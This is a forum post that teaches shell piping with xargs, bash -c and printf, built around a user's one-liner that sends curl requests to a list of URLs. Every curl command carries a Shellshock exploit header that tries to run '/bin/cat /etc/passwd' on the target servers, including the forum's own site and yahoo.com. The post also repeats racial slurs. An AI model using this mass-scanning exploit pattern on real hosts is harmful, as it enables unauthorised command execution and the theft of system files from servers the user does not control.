Posting from my dev account because fucking vb lets admins insert arbitrary html and it's fucking things up. Anyway.
The nice thing about bash it has a really good repl, even if we never think of it like that, so punching stuff into the command line to test step-by-step works well. So let's assume xargs is working right we would expect curl to be invoked with urls repeatedly so lets start from there:
[lanny:~]$ curl "http://niggasin.space/" -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>Access denied | niggasin.space used CloudFlare to restrict access</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
Well that works, now let's try to tack on the printf:
[lanny:~]$ curl "http://niggasin.space/" -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" | printf "%b \n\n"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 3467 0 3467 0 0 101k 0 --:--:-- --:--:-- --:--:-- 102k
(23) Failed writing body
[lanny:~]$
Well that's interesting, let us contemplate the man page:
[lanny:~]$ man -P cat printf
PRINTF(1) BSD General Commands Manual PRINTF(1)
NAME
printf -- formatted output
SYNOPSIS
printf format [arguments ...]
DESCRIPTION
The printf utility formats and prints its arguments, after the first, under control of the format. The format is a
character string which contains three types of objects: plain characters, which are simply copied to standard out-
put, character escape sequences which are converted and copied to the standard output, and format specifications,
each of which causes printing of the next successive argument.
My emphasis added. printf operates on its arguments as opposed to stdin, which means it can't take input from a pipe on its own (pipes take stdout of the left hand side and feed it to stdin of the right). The distinction may seem trivial but it's important to understand and is the main reason we have xargs (you can think of xargs as a utility for transforming stdin into arguments) so let's try that:
[lanny:~]$ curl "http://niggasin.space/" -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" | xargs printf "%b NIGGA\n"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 3467 0 3467 0 0 105k 0 --:--:-- --:--:-- --:--:-- 105k
<!DOCTYPE NIGGA
html> NIGGA
<!--[if NIGGA
lt NIGGA
IE NIGGA
7]> NIGGA
<html NIGGA
class=no-js ie6 oldie NIGGA
lang=en-US> NIGGA
Changed printf to be `printf "%b NIGGA\n"` just because that's easier to identify than a newline. So we're getting closer but I'm assuming you were trying to put a double newline between the result of each request rather than just at the end of each line. To do that we need to get a little trickier, let's try:
[lanny:~]$ echo "http://niggasin.space/\nhttp://yahoo.com/" | xargs -t -I % bash -c 'curl % -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'
bash -c curl http://niggasin.space/ -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>Access denied | niggasin.space used CloudFlare to restrict access</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />
<!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
<style type="text/css">body{margin:0;padding:0}</style>
<!--[if lte IE 9]><script type="text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script><![endif]-->
<!--[if gte IE 10]><!--><script type="text/javascript" src="/cdn-cgi/scripts/zepto.min.js"></script><!--<![endif]-->
<script type="text/javascript" src="/cdn-cgi/scripts/cf.common.js"></script>
</head>
<body>
<div id="cf-wrapper">
<div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
<div id="cf-error-details" class="cf-error-details-wrapper">
<div class="cf-wrapper cf-header cf-error-overview">
<h1>
<span class="cf-error-type" data-translate="error">Error</span>
<span class="cf-error-code">1012</span>
<small class="heading-ray-id">Ray ID: 257e65cd668011d1 • 2015-12-20 21:21:34 UTC</small>
</h1>
<h2 class="cf-subheadline" data-translate="error_desc">Access denied</h2>
</div><!-- /.header -->
<section></section><!-- spacer -->
<div class="cf-section cf-wrapper">
<div class="cf-columns two">
<div class="cf-column">
<h2 data-translate="what_happened">What happened?</h2>
<p>The owner of this website (niggasin.space) has forbidden your access based on malicious activity detected from your computer or your network (73.222.180.57). The most likely cause of this is a virus or malware infection on your machine. Please update your anti-virus software and run a full system scan.</p>
</div>
</div>
</div><!-- /.section -->
<div class="cf-error-footer cf-wrapper">
<p>
<span class="cf-footer-item">CloudFlare Ray ID: <strong>257e65cd668011d1</strong></span>
<span class="cf-footer-separator">•</span>
<span class="cf-footer-item"><span data-translate="your_ip">Your IP</span>: 73.222.180.57</span>
<span class="cf-footer-separator">•</span>
<span class="cf-footer-item"><span data-translate="performance_security_by">Performance & security by</span> <a data-orig-proto="https" data-orig-ref="www.cloudflare.com/5xx-error-landing?utm_source=error_footer" id="brand_link" target="_blank">CloudFlare</a></span>
</p>
</div><!-- /.error-footer -->
</div><!-- /#cf-error-details -->
</div><!-- /#cf-wrapper -->
<script type="text/javascript">
window._cf_translation = {};
</script>
</body>
</html>
----END OF RESPONSE----
bash -c curl http://yahoo.com/ -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----
<HTML>
<HEAD>
<TITLE>Error</TITLE>
</HEAD>
<BODY BGCOLOR="white" FGCOLOR="black">
<!-- status code : 301 -->
<!-- Error: GET -->
<!-- host machine: ir13.fp.ne1.yahoo.com -->
<!-- timestamp: 1450646494.000 -->
<!-- url: http://yahoo.com/-->
<H1>Error</H1>
<HR>
<FONT FACE="Helvetica,Arial"><B>
Description: Could not process this "GET" request.
</B></FONT>
<HR>
</BODY>
----END OF RESPONSE---
There we go, so let's look at why that works, here's our command:
echo "http://niggasin.space/\nhttp://yahoo.com/" | xargs -I % bash -c 'curl % -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'
So the left side of that pipe is just producing something for xargs to chew on. The "-t" flag just says "show me the command you're about to execute before you do it" when is why we see things like "bash -c curl
http://yahoo.com/ -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----" in the output. You'll probably want to pull that flag out when using it, mostly for debugging. The "-I %" flag says "replace every instance of '%' that occur in the strings passed to xargs with the args formed from stdin". So what we want to do for each line of input is execute two commands, one for curl and one to insert our end of response marker. The idea of piping the output of xargs to printf was a good idea but just by nature of the execution model xargs doesn't indicate the difference between one invocation of its command and the next, it just produces a continuous stream so with your original command printf would only be invoked once rather than onc per execution of curl. So what we do here is execute "bash -c" which is just "start bash, run the command following -c, and exit" and is generally how you go from commands you build as strings to execution. So anyway, xargs does the % replace thing and then we run bash, which in turn runs curl and echo, then xargs moves onto the next item and does it all over again. Notice the single quote just before curl and its pair at the end, in bash-like shells single quotes are used for non-interpolated strings, so things like $VAR don't happen, you can use double quotes without escaping them, so on and so forth. Useful when you're writing a string with syntax the (top level) shell would otherwise try to parse.
There are probably other, probably better ways of doing this but it works as a one-liner so there you go. Would be interested if aldra has anything cleverer or cleaner (I've always felt like invoking sub-shells is kind of a kludge but I see it often enough that I think it's accepted as common practice).
